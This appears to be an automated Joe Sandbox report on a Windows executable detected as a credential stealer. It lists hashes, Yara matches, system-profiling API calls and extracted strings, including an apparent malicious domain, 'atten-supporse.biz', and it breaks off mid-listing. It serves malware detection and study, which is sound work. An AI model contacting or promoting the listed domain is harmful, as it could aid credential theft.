h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1524&rtt_var=762&sent=341&recv=600&lost=0&retrans=1&sent_bytes=4232&recv_bytes=573903&delivery_rate=245936&cwnd=208&unsent_bytes=0&cid=49d440cadcc76112&ts=3805&x=0"

Target ID:	0
Start time:	17:25:03
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xb0000
File size:	1'846'272 bytes
MD5 hash:	1CFA4D3434F4056FD9D63F5C16C73C76
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2259071375.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2212521763.0000000001005000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2235655968.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2259012497.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2190452514.0000000001001000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2235678317.0000000001005000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2212421747.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2212500277.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2261414653.0000000001009000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	66.9%
Total number of Nodes:	266
Total number of Limit Nodes:	25

Executed Functions

Function 000D15F0 Relevance: 28.1, Strings: 22, Instructions: 608
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 000D1A76
/, xrefs: 000D1A80
?, xrefs: 000D18EF
y, xrefs: 000D1C69
=, xrefs: 000D18E5
`, xrefs: 000D1699
,, xrefs: 000D1A71
`, xrefs: 000D1D60
a, xrefs: 000D1D5B
b, xrefs: 000D1AE8
c, xrefs: 000D1AE3
a, xrefs: 000D1694
x, xrefs: 000D1C64
/, xrefs: 000D1A7B
`, xrefs: 000D1AF2
c, xrefs: 000D168A
a, xrefs: 000D1AED
!@, xrefs: 000D1623
,, xrefs: 000D1BCF
b, xrefs: 000D168F
b, xrefs: 000D1D56
c, xrefs: 000D1D51

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: !@$$$,$,$/$/$=$?$`$`$`$a$a$a$b$b$b$c$c$c$x$y
API String ID: 0-2322859148
Opcode ID: b7e1b272d91586ded3cd0d6758792193afec692a01acc8a8c650ebe4d494f94e
Instruction ID: 80e3613fdca3ddb10dd340138cfb2d1495fd1182ccdc5dc24122dd165c818636
Opcode Fuzzy Hash: b7e1b272d91586ded3cd0d6758792193afec692a01acc8a8c650ebe4d494f94e
Instruction Fuzzy Hash: 4732F67160C3809FD3248B28C4953AFFBE2ABD5314F19892EE5D587392DBB98845CB53

Function 000E6F90 Relevance: 25.1, APIs: 5, Strings: 9, Instructions: 579
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(D080DE8F), ref: 000E71DC
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000E7218
SysFreeString.OLEAUT32(?), ref: 000E7504
SysFreeString.OLEAUT32(?), ref: 000E750A
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000E7552

Strings

>C, xrefs: 000E70D7
.'(), xrefs: 000E7008, 000E70C1
!", xrefs: 000E71A9
{.] , xrefs: 000E71A1
p*v,, xrefs: 000E7199
{|, xrefs: 000E73BF
C, xrefs: 000E70CF
.;, xrefs: 000E7282
"#$%, xrefs: 000E75FC

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
API String ID: 1773362589-264043890
Opcode ID: 704c3b0af06920ea43f10c11eafab927755cb89dd5555940d708db974900a4b8
Instruction ID: f5e54e4c8862dbcf7678cd459fc0ee7401440b84f03a8a523ac49c66021db04e
Opcode Fuzzy Hash: 704c3b0af06920ea43f10c11eafab927755cb89dd5555940d708db974900a4b8
Instruction Fuzzy Hash: 3002F0B160C3409FD310DF65DC81B6BBBE5EB85304F14892CF699AB2A1E779D805CB92

Function 000BE2A9 Relevance: 12.5, APIs: 1, Strings: 7, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 000BE674

Strings

I~, xrefs: 000BE8E3
`~, xrefs: 000BE8CD
qx, xrefs: 000BE8EE
s, xrefs: 000BE736
"# `, xrefs: 000BE70A
atten-supporse.biz, xrefs: 000BE649, 000BE9DD
,, xrefs: 000BE688

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: Uninitialize
String ID: "# `$,$I~$`~$atten-supporse.biz$qx$s
API String ID: 3861434553-3378010734
Opcode ID: 1968ca357d9c4b10078b706c89a2e2b8eb541cabc27591246360e92354887747
Instruction ID: 051abfb43a450877f4febd54a5a919592bfa6ed22051f3df6de8f4f33ce015e8
Opcode Fuzzy Hash: 1968ca357d9c4b10078b706c89a2e2b8eb541cabc27591246360e92354887747
Instruction Fuzzy Hash: A902BDB014C3D18BD775CF2584A07EBBFE1AF92304F1899ACD4DA5B252D679050ACBA3

Function 000BA960 Relevance: 9.2, Strings: 7, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n, xrefs: 000BA982
N[\D, xrefs: 000BAD01, 000BACD2, 000BACF6, 000BABA4, 000BADEE, 000BABC5, 000BADB7, 000BADC0
#xDz, xrefs: 000BAACE
kl, xrefs: 000BAB2D
'D F, xrefs: 000BAAC6
N[\D, xrefs: 000BAC00
A|}~, xrefs: 000BAAD6

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
API String ID: 0-490458541
Opcode ID: 1ca357d7734a5239fb00db14aa3d8b06389cda7b0299986a1dce5654a2a585bc
Instruction ID: d7b5e8e0cb37436717a6203be6d541192ec4de0d0cffc5e399de6c2557361325
Opcode Fuzzy Hash: 1ca357d7734a5239fb00db14aa3d8b06389cda7b0299986a1dce5654a2a585bc
Instruction Fuzzy Hash: 7DC1027260C3505BC724CF6488906AFBBD3ABC2304F1A897CE9D65B742D676990AC783

Function 000BCE55 Relevance: 9.0, Strings: 7, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

F^, xrefs: 000BD0B9
5A1B8FA3BC14C5DD23D904AF30EFEBBC, xrefs: 000BCEAF
I@, xrefs: 000BD0C4
N~ :, xrefs: 000BCF45
z@(, xrefs: 000BCF5B
VgfW, xrefs: 000BCF2F
atten-supporse.biz, xrefs: 000BD27A

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: 5A1B8FA3BC14C5DD23D904AF30EFEBBC$F^$I@$N~ :$VgfW$atten-supporse.biz$z@(
API String ID: 0-69581575
Opcode ID: 41c9ab414d773e8e21382777acfac6e9967d9c32caf459eca2d221ff0f99626a
Instruction ID: 2395258d5fffd86f76a76a7df695d730d3cdda7514a8970d1c73cf51bad48eb7
Opcode Fuzzy Hash: 41c9ab414d773e8e21382777acfac6e9967d9c32caf459eca2d221ff0f99626a
Instruction Fuzzy Hash: A891D0B054D3C18BD375CF25D8A0BEBBBE0AB96314F148D6CD4D94B242E738454ADB92

Function 000D33A0 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ij, xrefs: 000D397D
VW, xrefs: 000D33E5
$^<P, xrefs: 000D363F
#R,T, xrefs: 000D3647
]~"p, xrefs: 000D367F
KM, xrefs: 000D37FB

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: #R,T$$^<P$VW$]~"p$ij$KM
API String ID: 0-788320361
Opcode ID: 356ce4797b9995bdfddee3899751fad0498ebe1fbf517049a8247e5ed55b1714
Instruction ID: bbf71c3d141de584114d76babcac749a037252ce4e7d1e0212732ae2f0b94bff
Opcode Fuzzy Hash: 356ce4797b9995bdfddee3899751fad0498ebe1fbf517049a8247e5ed55b1714
Instruction Fuzzy Hash: E5F1D9B06083408FD314DF65D88266BBBE1FF95304F44892DE4968B751EB78DA06CB93

Function 000DBFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 000DC0D7
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 000DC113
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 000DC1D8

Strings

x, xrefs: 000DC2F2

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: x
API String ID: 2243422189-2363233923
Opcode ID: 2a38c8f104d4259d0d7337d2799a06ee3b852bc911e04df1f1c5ce15ec054adc
Instruction ID: af510f674020f8c2dbb79090f4ace0277ebf5541a1916bea2832aabe41fae60d
Opcode Fuzzy Hash: 2a38c8f104d4259d0d7337d2799a06ee3b852bc911e04df1f1c5ce15ec054adc
Instruction Fuzzy Hash: 95D1B36060C7D18EEB358B2984507BBBFE1AFD7344F1849ADD0C99B382D6794506CB63

Function 000E6C40 Relevance: 6.5, Strings: 5, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

cba`cba`, xrefs: 000E6DDF
c, xrefs: 000E6ECC
a, xrefs: 000E6ED4
b, xrefs: 000E6ED0
`, xrefs: 000E6ED8

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: `$a$b$c$cba`cba`
API String ID: 0-3925122358
Opcode ID: bac3905b8c950363099af6823f3c66229dcb71a278ad53720ce19f4a5fc917ef
Instruction ID: 441253810a1a7b7294a698b13aeb5c049b564d9e3a8a8a32617cb40d7dec79e1
Opcode Fuzzy Hash: bac3905b8c950363099af6823f3c66229dcb71a278ad53720ce19f4a5fc917ef
Instruction Fuzzy Hash: DBA13B71E083948FDB14CBA9E8553BEBFF2ABA5340F1D846DD446B7392C67A8900CB51

Function 000BC36E Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

){+}, xrefs: 000BC788
F'k), xrefs: 000BC706
GS, xrefs: 000BC677
4cde, xrefs: 000BC79C
CJ, xrefs: 000BC67E

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: ){+}$4cde$CJ$F'k)$GS
API String ID: 0-4192230409
Opcode ID: 1b0299640ae5b00a51416d410f758529c6cb228fd4c94a4de15644cabf93f80a
Instruction ID: 2a20dee8fb46ce0991dfff0645b55d4cbf3edbf4ac1366285b67969643f628bd
Opcode Fuzzy Hash: 1b0299640ae5b00a51416d410f758529c6cb228fd4c94a4de15644cabf93f80a
Instruction Fuzzy Hash: 7CB12BB84053058FE354DF628588FAA7BB0FB25314F1A82E9E0892F732D7788405CF96

Function 000DC6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 000DCC09
iJ, xrefs: 000DCAF5

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: '$iJ
API String ID: 0-30662343
Opcode ID: 299c4a336a23a7ea6ed6b25e1743778ecb932dc1f029660a5100be0cf8567282
Instruction ID: d6c9478a5a0dccacb7ab8581924c7aad46ead46e4721dd32214acb708d29b13a
Opcode Fuzzy Hash: 299c4a336a23a7ea6ed6b25e1743778ecb932dc1f029660a5100be0cf8567282
Instruction Fuzzy Hash: 9702E37050C3D28FD7298F2984607ABBBE1AF97304F18496ED4DA97382D7798405CB67

Function 000DBFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 000DC113
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 000DC1D8

Strings

x, xrefs: 000DC2F2

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: ComputerName
String ID: x
API String ID: 3545744682-2363233923
Opcode ID: 0234aac71542722eb7b198bb9de869952c051e5de7959c0b500b51a2df0ae10a
Instruction ID: cd871685b3a84c3d9f2c2769c13d6eca6284f04fd01992e7eab739443527aa23
Opcode Fuzzy Hash: 0234aac71542722eb7b198bb9de869952c051e5de7959c0b500b51a2df0ae10a
Instruction Fuzzy Hash: 2ED1076060C7D28EE7398B2884507BBBBD1AFD7354F18866ED0D54B386D7398906C763

Function 000B97B0 Relevance: 5.4, Strings: 4, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_P, xrefs: 000B9C05
w, xrefs: 000B995C
EIFT, xrefs: 000B9875, 000B9880, 000B98C1
5A1B8FA3BC14C5DD23D904AF30EFEBBC, xrefs: 000B987B

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
